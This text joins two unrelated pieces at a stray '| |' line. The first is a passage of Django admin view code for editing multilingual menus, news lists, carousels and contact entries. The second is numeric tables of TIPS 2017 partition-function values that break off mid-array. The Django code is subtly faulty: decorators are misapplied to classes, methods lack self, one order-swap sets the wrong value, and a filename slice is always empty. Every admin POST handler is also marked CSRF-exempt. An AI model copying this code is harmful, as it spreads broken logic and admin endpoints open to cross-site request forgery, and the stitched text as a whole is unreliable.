menu_yw = request.POST.get("menu_yw", "")
menu_fw = request.POST.get("menu_fw", "")
menu_xby = request.POST.get("menu_xby", "")
menu_pty = request.POST.get("menu_pty", "")
print("POST不打開", menu, menu_name, menu_url)
sm_nub = SmAdminMenu.objects.filter(parent_id=menu).count()
SmAdminMenu.objects.create(parent_id=menu, menu_mc=menu_name, menu_order=sm_nub + 1, url=menu_url,
nenu_names_zh_hant=menu_ft, nenu_names_zh_hans=menu_jt, nenu_names_en=menu_yw,
nenu_names_fr=menu_fw, nenu_names_pt=menu_xby, nenu_names_es=menu_pty)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def del_menu(request):
"""
:param request:
:return:
"""
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
menu_count = SmAdminMenu.objects.filter(parent_id=menu).count()
SmAdminMenu.objects.filter(parent_id=menu, menu_order=menu_order).delete()
print(menu_order, menu_count)
for nub in range(int(menu_order), menu_count + 1):
print(menu_order, menu_count)
SmAdminMenu.objects.filter(parent_id=menu, menu_order=nub).update(menu_order=nub - 1)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
class change_menu(View):
def get(request):
header_info = getheader_info(request)
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
smAdminMenu = SmAdminMenu.objects.get(parent_id=menu, menu_order=menu_order)
print(smAdminMenu)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-menu.html",
{"header_info": header_info, "smAdminMenu": smAdminMenu})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
menu_name = request.POST.get("menu_name", "")
menu_url = request.POST.get("menu_url", "")
menu_ft = request.POST.get("menu_ft", "")
menu_jt = request.POST.get("menu_jt", "")
menu_yw = request.POST.get("menu_yw", "")
menu_fw = request.POST.get("menu_fw", "")
menu_xby = request.POST.get("menu_xby", "")
menu_pty = request.POST.get("menu_pty", "")
print("POST不打開", menu, menu_order, menu_name, menu_url)
SmAdminMenu.objects.filter(parent_id=menu, menu_order=menu_order).update(menu_mc=menu_name,
url=menu_url,
nenu_names_zh_hant=menu_ft,
nenu_names_zh_hans=menu_jt,
nenu_names_en=menu_yw,
nenu_names_fr=menu_fw,
nenu_names_pt=menu_xby,
nenu_names_es=menu_pty)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def change_menu_add(request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
sm_nub = SmAdminMenu.objects.filter(parent_id=menu).count()
if int(menu_order) >= sm_nub:
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=error&i=v1")
sm_one = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order))
sm_two = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order) + 1)
sm_one.menu_order = int(menu_order) + 1
sm_two.menu_order = int(menu_order)
sm_one.save()
sm_two.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=success&i=v1")
@login_required
def change_menu_dir(request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
sm_nub = 1
if int(menu_order) <= sm_nub:
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=error&i=v1")
print(int(menu), int(menu_order))
sm_one = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order) - 1)
sm_two = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order))
sm_one.menu_order = int(menu_order) + 1
sm_two.menu_order = int(menu_order)
sm_one.save()
sm_two.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=success&i=v1")
@login_required
class change_url_info(View):
def get(request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
index_info = IndexInfo.objects.get(id=menu_order)
print(index_info)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-urlinfo.html",
{"header_info": header_info, "index_info": index_info})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
menu = request.GET.get("menu")
page_info = request.POST.get("page_info", "")
page_where = request.POST.get("page_where", "")
page_url = request.POST.get("page_url", "")
page_name_zh_hant = request.POST.get("page_name_zh_hant", "")
page_name_zh_hans = request.POST.get("page_name_zh_hans", "")
page_name_en = request.POST.get("page_name_en", "")
page_name_fr = request.POST.get("page_name_fr", "")
page_name_es = request.POST.get("page_name_es", "")
page_name_pt = request.POST.get("page_name_pt", "")
print("POST不打開", page_where, menu, page_info, page_url)
IndexInfo.objects.filter(id=menu).update(page_info=page_info, page_where=page_where, page_url=page_url,
page_name_zh_hant=page_name_zh_hant,
page_name_zh_hans=page_name_zh_hans, page_name_en=page_name_en,
page_name_fr=page_name_fr, page_name_es=page_name_es,
page_name_pt=page_name_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
class add_news_list(View):
def get(request):
header_info = getheader_info(request)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/newslist/add-news-list.html",
{"header_info": header_info})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
news_name = request.POST.get("news_name", "")
news_url = request.POST.get("news_url", "")
news_info_zh_hant = request.POST.get("news_info_zh_hant", "")
news_info_zh_hans = request.POST.get("news_info_zh_hans", "")
news_info_en = request.POST.get("news_info_en", "")
news_info_fr = request.POST.get("news_info_fr", "")
news_info_es = request.POST.get("news_info_es", "")
news_info_pt = request.POST.get("news_info_pt", "")
NewsInfo.objects.create(news_name=news_name, news_url=news_url, news_info_zh_hant=news_info_zh_hant,
news_info_zh_hans=news_info_zh_hans, news_info_en=news_info_en,
news_info_fr=news_info_fr, news_info_es=news_info_es, news_info_pt=news_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
class change_news_list(View):
def get(request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
news_info = NewsInfo.objects.get(id=menu_order)
print(news_info)
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/newslist/change-news-list.html",
{"header_info": header_info, "news_info": news_info})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
menu = request.GET.get("menu")
news_name = request.POST.get("news_name", "")
news_url = request.POST.get("news_url", "")
news_info_zh_hant = request.POST.get("news_info_zh_hant", "")
news_info_zh_hans = request.POST.get("news_info_zh_hans", "")
news_info_en = request.POST.get("news_info_en", "")
news_info_fr = request.POST.get("news_info_fr", "")
news_info_es = request.POST.get("news_info_es", "")
news_info_pt = request.POST.get("news_info_pt", "")
NewsInfo.objects.filter(id=menu).update(news_name=news_name, news_url=news_url,
news_info_zh_hant=news_info_zh_hant,
news_info_zh_hans=news_info_zh_hans, news_info_en=news_info_en,
news_info_fr=news_info_fr, news_info_es=news_info_es,
news_info_pt=news_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def del_news_list(request):
menu = request.GET.get("menu_order", "")
NewsInfo.objects.filter(id=menu).delete()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
class add_homecarousel(View):
def get(request):
header_info = getheader_info(request)
count = CarouselDisplay.objects.all().count() + 1
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/homecarousel/add-homecarousel.html",
{"header_info": header_info, 'count': count})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
carousel_nub = CarouselDisplay.objects.all().count() + 1
carousel_img = request.FILES['carousel_img']
carousel_url = request.POST.get("carousel_url", "")
carousel_info_zh_hant = request.POST.get("carousel_info_zh_hant", "")
carousel_info_zh_hans = request.POST.get("carousel_info_zh_hans", "")
carousel_info_en = request.POST.get("carousel_info_en", "")
carousel_info_fr = request.POST.get("carousel_info_fr", "")
carousel_info_es = request.POST.get("carousel_info_es", "")
carousel_info_pt = request.POST.get("carousel_info_pt", "")
# add_homecarousel
carousel_display = CarouselDisplay.objects.create(carousel_nub=carousel_nub, carousel_url=carousel_url,
carousel_info_zh_hant=carousel_info_zh_hant,
carousel_info_zh_hans=carousel_info_zh_hans,
carousel_info_en=carousel_info_en,
carousel_info_fr=carousel_info_fr,
carousel_info_es=carousel_info_es,
carousel_info_pt=carousel_info_pt)
carousel_display.carousel_img.save('card' + str(time.time())[0:9] + str(time.time())[5:0] + ".jpg",
carousel_img, save=True)
carousel_display.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
class change_homecarousel(View):
def get(request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
carousel_display = CarouselDisplay.objects.get(id=menu_order)
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/homecarousel/change-homecarousel.html",
{"header_info": header_info, "carousel_display": carousel_display})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
menu_order = request.GET.get("menu_order")
carousel_url = request.POST.get("carousel_url", "")
try:
carousel_img = request.FILES['carousel_img']
except:
carousel_img = None
carousel_info_zh_hant = request.POST.get("carousel_info_zh_hant", "")
carousel_info_zh_hans = request.POST.get("carousel_info_zh_hans", "")
carousel_info_en = request.POST.get("carousel_info_en", "")
carousel_info_fr = request.POST.get("carousel_info_fr", "")
carousel_info_es = request.POST.get("carousel_info_es", "")
carousel_info_pt = request.POST.get("carousel_info_pt", "")
carousel_display = CarouselDisplay.objects.get(carousel_nub=menu_order)
carousel_display.carousel_url = carousel_url
carousel_display.carousel_info_zh_hant = carousel_info_zh_hant
carousel_display.carousel_info_zh_hans = carousel_info_zh_hans
carousel_display.carousel_info_en = carousel_info_en
carousel_display.carousel_info_fr = carousel_info_fr
carousel_display.carousel_info_es = carousel_info_es
carousel_display.carousel_info_pt = carousel_info_pt
if carousel_img is not None:
carousel_display.carousel_img.save('card' + str(time.time())[0:9] + str(time.time())[5:0] + ".jpg",
carousel_img, save=True)
carousel_display.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def del_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
CarouselDisplay.objects.get(carousel_nub=menu_order).delete()
print(menu_order, menu_count)
for nub in range(int(menu_order), menu_count + 1):
print(nub, menu_order, menu_count)
CarouselDisplay.objects.filter(carousel_nub=nub + 1).update(carousel_nub=nub)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def up_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
if 1 < int(menu_order) <= menu_count:
c1 = CarouselDisplay.objects.get(carousel_nub=menu_order)
c2 = CarouselDisplay.objects.get(carousel_nub=int(menu_order) - 1)
c1.carousel_nub = int(menu_order) - 1
c2.carousel_nub = int(menu_order)
c1.save()
c2.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def down_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
if 1 <= int(menu_order) < menu_count:
c1 = CarouselDisplay.objects.get(carousel_nub=menu_order)
c2 = CarouselDisplay.objects.get(carousel_nub=int(menu_order) + 1)
c1.carousel_nub = int(menu_order) + 1
c2.carousel_nub = int(menu_order)
c1.save()
c2.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
class change_enter_info(View):
def get(request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
index_info = ContactInfo.objects.get(id=menu_order)
print(index_info)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-enterinfo.html",
{"header_info": header_info, "index_info": index_info})
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
menu = request.GET.get("menu")
contact_nub = request.POST.get("contact_nub", "")
contact_name = request.POST.get("contact_name", "")
contact_url = request.POST.get("contact_url", "")
contact_info_zh_hant = request.POST.get("contact_info_zh_hant", "")
contact_info_zh_hans = request.POST.get("contact_info_zh_hans", "")
contact_info_en = request.POST.get("contact_info_en", "")
contact_info_fr = request.POST.get("contact_info_fr", "")
contact_info_es = request.POST.get("contact_info_es", "")
contact_info_pt = request.POST.get("contact_info_pt", "")
print("POST不打開", contact_nub, menu, contact_name, contact_url)
ContactInfo.objects.filter(id=menu).update(contact_nub=contact_nub, contact_name=contact_name,
contact_url=contact_url,
contact_info_zh_hant=contact_info_zh_hant,
contact_info_zh_hans=contact_info_zh_hans,
contact_info_en=contact_info_en,
contact_info_fr=contact_info_fr, contact_info_es=contact_info_es,
contact_info_pt=contact_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
# ************************************ *******************************************#
# carousel_list
class add_carousel_list(View):
@login_required
def get(request):
header_info = getheader_info(request)
count = ColumnListsInfo.objects.all().count() + 1
return render(request,
"backstage/userauth/pagefile/base/footerindex/addform/page/homecarousel/add-homecarousel.html",
{"header_info": header_info,'count':count})
@login_required
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
column_lists_nub = ColumnListsInfo.objects.all().count() + 1
column_url = request.POST.get("column_url", "")
column_lists_img = request.FILES['column_lists_img']
column_lists_title_zh_hant = request.POST.get("column_lists_title_zh_hant", "")
column_lists_title_zh_hans = request.POST.get("column_lists_title_zh_hans", "")
column_lists_title_en = request.POST.get("column_lists_title_en", "")
column_lists_title_fr = request.POST.get("column_lists_title_fr", "")
column_lists_title_es = request.POST.get("column_lists_title_es", "")
column_lists_title_pt = request.POST.get("column_lists_title_pt", "")
column_lists_subtitle_zh_hant = request.POST.get("column_lists_subtitle_zh_hant", "")
column_lists_subtitle_zh_hans = request.POST.get("column_lists_subtitle_zh_hans", "")
column_lists_subtitle_en = request.POST.get("column_lists_subtitle_en", "")
column_lists_subtitle_fr = request.POST.get("column_lists_subtitle_fr", "")
column_lists_subtitle_es = request.POST.get("column_lists_subtitle_es", "")
column_lists_subtitle_pt = request.POST.get("column_lists_subtitle_pt", "")
column_lists_alt_zh_hant = request.POST.get("column_lists_alt_zh_hant", "")
column_lists_alt_zh_hans = request.POST.get("column_lists_alt_zh_hans", "")
column_lists_alt_en = request.POST.get("column_lists_alt_en", "")
column_lists_alt_fr = request.POST.get("column_lists_alt_fr", "")
column_lists_alt_es = request.POST.get("column_lists_alt_es", "")
column_lists_alt_pt = request.POST.get("column_lists_alt_pt", "")
column_lists = ColumnListsInfo.objects.create(column_lists_nub=column_lists_nub, column_url=column_url,
column_lists_title_zh_hant=column_lists_title_zh_hant,
column_lists_title_zh_hans=column_lists_title_zh_hans,
column_lists_title_en=column_lists_title_en,
column_lists_title_fr=column_lists_title_fr,
column_lists_title_es=column_lists_title_es,
column_lists_title_pt=column_lists_title_pt,
column_lists_subtitle_zh_hant=column_lists_subtitle_zh_hant,
column_lists_subtitle_zh_hans=column_lists_subtitle_zh_hans,
column_lists_subtitle_en=column_lists_subtitle_en,
column_lists_subtitle_fr=column_lists_subtitle_fr,
column_lists_subtitle_es=column_lists_subtitle_es,
column_lists_subtitle_pt=column_lists_subtitle_pt,
column_lists_alt_zh_hant=column_lists_alt_zh_hant,
column_lists_alt_zh_hans=column_lists_alt_zh_hans,
column_lists_alt_en=column_lists_alt_en,
column_lists_alt_fr=column_lists_alt_fr,
column_lists_alt_es=column_lists_alt_es,
column_lists_alt_pt=column_lists_alt_pt,
)
column_lists.column_lists_img.save('card' + str(time.time())[0:9] + str(time.time())[5:0] + ".jpg",
column_lists_img, save=True)
column_lists.save()
return HttpResponseRedirect("/management-admin/basicinfo/footer_index.html")
class change_carousel_lists(View):
@login_required
def get(request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
carousel_display = ColumnListsInfo.objects.get(id=menu_order)
return render(request,
"backstage/userauth/pagefile/base/footerindex/addform/page/homecarousel/change-homecarousel.html",
{"header_info": header_info, "carousel_display": carousel_display})
@login_required
@csrf_exempt
@require_http_methods(["POST"])
def post(request):
column_lists_nub = request.GET.get("menu_order", "")
column_url = request.POST.get("column_url", "")
try:
column_lists_img = request.FILES['column_lists_img']
except:
column_lists_img = None
print(column_lists_nub)
column_lists_title_zh_hant = request.POST.get("column_lists_title_zh_hant", "")
column_lists_title_zh_hans = request.POST.get("column_lists_title_zh_hans", "")
column_lists_title_zh_en = request.POST.get("column_lists_title_en", "")
column_lists_title_fr = request.POST.get("column_lists_title_fr", "")
column_lists_title_es = request.POST.get("column_lists_title_es", "")
column_lists_title_pt = request.POST.get("column_lists_title_pt", "")
column_lists_subtitle_zh_hant = request.POST.get("column_lists_subtitle_zh_hant", "")
column_lists_subtitle_zh_hans = request.POST.get("column_lists_subtitle_zh_hans", | |
1.220342E+04,
1.225845E+04, 1.231360E+04, 1.236889E+04, 1.242431E+04, 1.247985E+04, 1.253553E+04,
1.259134E+04, 1.264728E+04, 1.270335E+04, 1.275955E+04, 1.281589E+04, 1.287235E+04,
1.292894E+04, 1.298567E+04, 1.304252E+04, 1.309951E+04, 1.315662E+04, 1.321387E+04,
1.327125E+04, 1.332876E+04, 1.338640E+04, 1.344417E+04, 1.350207E+04, 1.356010E+04,
1.361826E+04,
])
# ---------------------- M = 5, I = 8 ---------------------------
M = 5
I = 8
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[3]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
1.024260E+00, 8.644900E+00, 1.694486E+01, 2.524838E+01, 3.355335E+01, 4.185935E+01,
5.016626E+01, 5.847401E+01, 6.678257E+01, 7.509194E+01, 8.340213E+01, 9.171321E+01,
1.000254E+02, 1.083389E+02, 1.166545E+02, 1.249731E+02, 1.332960E+02, 1.416249E+02,
1.499621E+02, 1.583101E+02, 1.666720E+02, 1.750509E+02, 1.834505E+02, 1.918746E+02,
2.003270E+02, 2.088118E+02, 2.173329E+02, 2.258944E+02, 2.345004E+02, 2.431546E+02,
2.518609E+02, 2.606229E+02, 2.694442E+02, 2.783282E+02, 2.872781E+02, 2.962969E+02,
3.053877E+02, 3.145531E+02, 3.237958E+02, 3.331182E+02, 3.425226E+02, 3.520113E+02,
3.615863E+02, 3.712495E+02, 3.810028E+02, 3.908478E+02, 4.007862E+02, 4.108194E+02,
4.209489E+02, 4.311760E+02, 4.415019E+02, 4.519278E+02, 4.624548E+02, 4.730840E+02,
4.838163E+02, 4.946525E+02, 5.055937E+02, 5.166406E+02, 5.277939E+02, 5.390545E+02,
5.504229E+02, 5.618998E+02, 5.734859E+02, 5.851816E+02, 5.969876E+02, 6.089044E+02,
6.209324E+02, 6.330722E+02, 6.453241E+02, 6.576887E+02, 6.701662E+02, 6.827571E+02,
6.954618E+02, 7.082806E+02, 7.212138E+02, 7.342617E+02, 7.474247E+02, 7.607031E+02,
7.740971E+02, 7.876070E+02, 8.012330E+02, 8.149755E+02, 8.288346E+02, 8.428107E+02,
8.569038E+02, 8.711142E+02, 8.854422E+02, 8.998879E+02, 9.144515E+02, 9.291333E+02,
9.439334E+02, 9.588519E+02, 9.738891E+02, 9.890452E+02, 1.004320E+03, 1.019714E+03,
1.035228E+03, 1.050861E+03, 1.066613E+03, 1.082486E+03, 1.098478E+03, 1.114590E+03,
1.130822E+03, 1.147175E+03, 1.163648E+03, 1.180242E+03, 1.196956E+03, 1.213792E+03,
1.230748E+03, 1.247825E+03, 1.265023E+03, 1.282343E+03, 1.299784E+03, 1.317346E+03,
1.335031E+03, 1.352836E+03, 1.370764E+03, 1.388814E+03, 1.406986E+03, 1.425280E+03,
1.443696E+03, 1.462234E+03, 1.480895E+03, 1.499679E+03, 1.518585E+03, 1.537614E+03,
1.556766E+03, 1.576041E+03, 1.595439E+03, 1.614960E+03, 1.634605E+03, 1.654372E+03,
1.674264E+03, 1.694278E+03, 1.714417E+03, 1.734679E+03, 1.755065E+03, 1.775574E+03,
1.796208E+03, 1.816966E+03, 1.837848E+03, 1.858855E+03, 1.879985E+03, 1.901240E+03,
1.922620E+03, 1.944124E+03, 1.965753E+03, 1.987507E+03, 2.009386E+03, 2.031390E+03,
2.053519E+03, 2.075772E+03, 2.098152E+03, 2.120656E+03, 2.143286E+03, 2.166041E+03,
2.188922E+03, 2.211929E+03, 2.235061E+03, 2.258320E+03, 2.281704E+03, 2.305214E+03,
2.328850E+03, 2.352613E+03, 2.376502E+03, 2.400517E+03, 2.424658E+03, 2.448926E+03,
2.473321E+03, 2.497842E+03, 2.522490E+03, 2.547265E+03, 2.572167E+03, 2.597196E+03,
2.622352E+03, 2.647635E+03, 2.673046E+03, 2.698584E+03, 2.724249E+03, 2.750042E+03,
2.775962E+03, 2.802011E+03, 2.828187E+03, 2.854490E+03, 2.880922E+03, 2.907482E+03,
2.934170E+03, 2.960986E+03, 2.987930E+03, 3.015003E+03, 3.042204E+03, 3.069534E+03,
3.096992E+03, 3.124579E+03, 3.152295E+03, 3.180140E+03, 3.208113E+03, 3.236216E+03,
3.264448E+03, 3.292809E+03, 3.321299E+03, 3.349918E+03, 3.378667E+03, 3.407546E+03,
3.436554E+03, 3.465692E+03, 3.494959E+03, 3.524357E+03, 3.553884E+03, 3.583542E+03,
3.613329E+03, 3.643247E+03, 3.673295E+03, 3.703473E+03, 3.733781E+03, 3.764221E+03,
3.794790E+03, 3.825491E+03, 3.856322E+03, 3.887284E+03, 3.918377E+03, 3.949600E+03,
3.980955E+03, 4.012441E+03, 4.044059E+03, 4.075807E+03, 4.107687E+03, 4.139699E+03,
4.171842E+03, 4.204116E+03, 4.236523E+03, 4.269061E+03, 4.301731E+03, 4.334532E+03,
4.367466E+03, 4.400532E+03, 4.433731E+03, 4.467061E+03, 4.500524E+03, 4.534119E+03,
4.567847E+03, 4.601707E+03, 4.635700E+03, 4.669825E+03, 4.704084E+03, 4.738475E+03,
4.772999E+03, 4.807656E+03, 4.842447E+03, 4.877370E+03, 4.912427E+03, 4.947617E+03,
4.982940E+03, 5.018397E+03, 5.053988E+03, 5.089712E+03, 5.125570E+03, 5.161561E+03,
5.197686E+03, 5.233946E+03, 5.270339E+03, 5.306866E+03, 5.343528E+03, 5.380323E+03,
5.417253E+03, 5.454318E+03, 5.491516E+03, 5.528849E+03, 5.566317E+03, 5.603919E+03,
5.641656E+03, 5.679528E+03, 5.717535E+03, 5.755676E+03, 5.793953E+03, 5.832364E+03,
5.870911E+03, 5.909592E+03, 5.948409E+03, 5.987362E+03, 6.026449E+03, 6.065672E+03,
6.105031E+03, 6.144525E+03, 6.184155E+03, 6.223920E+03, 6.263821E+03, 6.303858E+03,
6.344031E+03, 6.384340E+03, 6.424784E+03, 6.465365E+03, 6.506082E+03, 6.546935E+03,
6.587924E+03, 6.629050E+03, 6.670312E+03, 6.711710E+03, 6.753245E+03, 6.794916E+03,
6.836724E+03, 6.878669E+03, 6.920750E+03, 6.962968E+03, 7.005323E+03, 7.047814E+03,
7.090443E+03, 7.133208E+03, 7.176111E+03, 7.219151E+03, 7.262327E+03, 7.305641E+03,
7.349092E+03, 7.392681E+03, 7.436407E+03, 7.480270E+03, 7.524270E+03, 7.568408E+03,
7.612684E+03, 7.657097E+03, 7.701647E+03, 7.746336E+03, 7.791162E+03, 7.836126E+03,
7.881227E+03, 7.926467E+03, 7.971844E+03, 8.017359E+03, 8.063013E+03, 8.108804E+03,
8.154733E+03, 8.200801E+03, 8.247006E+03, 8.293350E+03, 8.339832E+03, 8.386452E+03,
8.433210E+03, 8.480107E+03, 8.527142E+03, 8.574316E+03, 8.621628E+03, 8.669078E+03,
8.716667E+03, 8.764395E+03, 8.812261E+03, 8.860266E+03, 8.908409E+03, 8.956691E+03,
9.005112E+03, 9.053671E+03, 9.102369E+03, 9.151206E+03, 9.200182E+03, 9.249297E+03,
9.298551E+03, 9.347943E+03, 9.397474E+03, 9.447145E+03, 9.496954E+03, 9.546902E+03,
9.596990E+03, 9.647216E+03, 9.697582E+03, 9.748087E+03, 9.798730E+03, 9.849513E+03,
9.900435E+03, 9.951496E+03, 1.000270E+04, 1.005404E+04, 1.010552E+04, 1.015713E+04,
1.020889E+04, 1.026079E+04, 1.031282E+04, 1.036500E+04, 1.041731E+04, 1.046977E+04,
1.052236E+04, 1.057509E+04, 1.062797E+04, 1.068098E+04, 1.073413E+04, 1.078742E+04,
1.084085E+04, 1.089442E+04, 1.094813E+04, 1.100198E+04, 1.105596E+04, 1.111009E+04,
1.116436E+04, 1.121876E+04, 1.127331E+04, 1.132799E+04, 1.138282E+04, 1.143778E+04,
1.149289E+04, 1.154813E+04, 1.160351E+04, 1.165903E+04, 1.171470E+04, 1.177050E+04,
1.182644E+04, 1.188252E+04, 1.193874E+04, 1.199510E+04, 1.205159E+04, 1.210823E+04,
1.216501E+04, 1.222193E+04, 1.227898E+04, 1.233618E+04, 1.239351E+04, 1.245099E+04,
1.250860E+04, 1.256636E+04, 1.262425E+04, 1.268228E+04, 1.274045E+04, 1.279876E+04,
1.285722E+04, 1.291581E+04, 1.297453E+04, 1.303340E+04, 1.309241E+04, 1.315156E+04,
1.321084E+04, 1.327027E+04, 1.332983E+04, 1.338954E+04, 1.344938E+04, 1.350936E+04,
1.356949E+04, 1.362975E+04, 1.369015E+04, 1.375069E+04, 1.381136E+04, 1.387218E+04,
1.393314E+04, 1.399423E+04, 1.405547E+04, 1.411684E+04, 1.417835E+04, 1.424000E+04,
1.430179E+04, 1.436372E+04, 1.442579E+04, 1.448799E+04, 1.455034E+04, 1.461282E+04,
1.467545E+04,
])
# ---------------------- M = 5, I = 9 ---------------------------
M = 5
I = 9
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[3]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
6.128630E+00, 5.062329E+01, 9.917483E+01, 1.477481E+02, 1.963300E+02, 2.449180E+02,
2.935114E+02, 3.421098E+02, 3.907129E+02, 4.393208E+02, 4.879334E+02, 5.365511E+02,
5.851749E+02, 6.338065E+02, 6.824492E+02, 7.311080E+02, 7.797902E+02, 8.285052E+02,
8.772651E+02, 9.260840E+02, 9.749786E+02, 1.023967E+03, 1.073070E+03, 1.122307E+03,
1.171702E+03, 1.221277E+03, 1.271055E+03, 1.321059E+03, 1.371312E+03, 1.421836E+03,
1.472653E+03, 1.523784E+03, 1.575250E+03, 1.627071E+03, 1.679265E+03, 1.731850E+03,
1.784843E+03, 1.838260E+03, 1.892117E+03, 1.946428E+03, 2.001207E+03, 2.056467E+03,
2.112219E+03, 2.168475E+03, 2.225246E+03, 2.282542E+03, 2.340373E+03, 2.398746E+03,
2.457671E+03, 2.517156E+03, 2.577207E+03, 2.637832E+03, 2.699037E+03, 2.760829E+03,
2.823213E+03, 2.886195E+03, 2.949779E+03, 3.013971E+03, 3.078775E+03, 3.144196E+03,
3.210237E+03, 3.276902E+03, 3.344196E+03, 3.412121E+03, 3.480680E+03, 3.549878E+03,
3.619716E+03, 3.690198E+03, 3.761326E+03, 3.833102E+03, 3.905530E+03, 3.978611E+03,
4.052348E+03, 4.126742E+03, 4.201796E+03, 4.277511E+03, 4.353890E+03, 4.430934E+03,
4.508645E+03, 4.587024E+03, 4.666073E+03, 4.745793E+03, 4.826187E+03, 4.907254E+03,
4.988997E+03, 5.071417E+03, 5.154515E+03, 5.238293E+03, 5.322751E+03, 5.407890E+03,
5.493712E+03, 5.580218E+03, 5.667408E+03, 5.755285E+03, 5.843848E+03, 5.933099E+03,
6.023038E+03, 6.113667E+03, 6.204986E+03, 6.296996E+03, 6.389699E+03, 6.483094E+03,
6.577183E+03, 6.671967E+03, 6.767446E+03, 6.863621E+03, 6.960492E+03, 7.058061E+03,
7.156329E+03, 7.255295E+03, 7.354961E+03, 7.455327E+03, 7.556394E+03, 7.658162E+03,
7.760633E+03, 7.863807E+03, 7.967684E+03, 8.072266E+03, 8.177552E+03, 8.283544E+03,
8.390242E+03, 8.497647E+03, 8.605758E+03, 8.714578E+03, 8.824106E+03, 8.934343E+03,
9.045289E+03, 9.156946E+03, 9.269313E+03, 9.382392E+03, 9.496182E+03, 9.610685E+03,
9.725901E+03, 9.841830E+03, 9.958473E+03, 1.007583E+04, 1.019390E+04, 1.031269E+04,
1.043220E+04, 1.055242E+04, 1.067336E+04, 1.079501E+04, 1.091739E+04, 1.104048E+04,
1.116429E+04, 1.128882E+04, 1.141408E+04, 1.154005E+04, 1.166674E+04, 1.179416E+04,
1.192230E+04, 1.205116E+04, 1.218075E+04, 1.231106E+04, 1.244209E+04, 1.257385E+04,
1.270633E+04, 1.283954E+04, 1.297348E+04, 1.310814E+04, 1.324353E+04, 1.337965E+04,
1.351649E+04, 1.365407E+04, 1.379237E+04, 1.393140E+04, 1.407117E+04, 1.421166E+04,
1.435289E+04, 1.449485E+04, 1.463754E+04, 1.478096E+04, 1.492512E+04, 1.507001E+04,
1.521563E+04, 1.536199E+04, 1.550909E+04, 1.565692E+04, 1.580548E+04, 1.595479E+04,
1.610483E+04, 1.625560E+04, 1.640712E+04, 1.655937E+04, 1.671237E+04, 1.686610E+04,
1.702057E+04, 1.717579E+04, 1.733174E+04, 1.748844E+04, 1.764588E+04, 1.780406E+04,
1.796298E+04, 1.812265E+04, 1.828306E+04, 1.844421E+04, 1.860611E+04, 1.876876E+04,
1.893215E+04, 1.909629E+04, 1.926117E+04, 1.942680E+04, 1.959318E+04, 1.976031E+04,
1.992819E+04, 2.009681E+04, 2.026619E+04, 2.043631E+04, 2.060719E+04, 2.077882E+04,
2.095120E+04, 2.112433E+04, 2.129821E+04, 2.147285E+04, 2.164824E+04, 2.182438E+04,
2.200128E+04, 2.217893E+04, 2.235734E+04, 2.253651E+04, 2.271643E+04, 2.289711E+04,
2.307854E+04, 2.326073E+04, 2.344368E+04, 2.362739E+04, 2.381186E+04, 2.399709E+04,
2.418308E+04, 2.436983E+04, 2.455734E+04, 2.474561E+04, 2.493464E+04, 2.512444E+04,
2.531500E+04, 2.550632E+04, 2.569841E+04, 2.589126E+04, 2.608487E+04, 2.627925E+04,
2.647440E+04, 2.667031E+04, 2.686699E+04, 2.706444E+04, 2.726265E+04, 2.746163E+04,
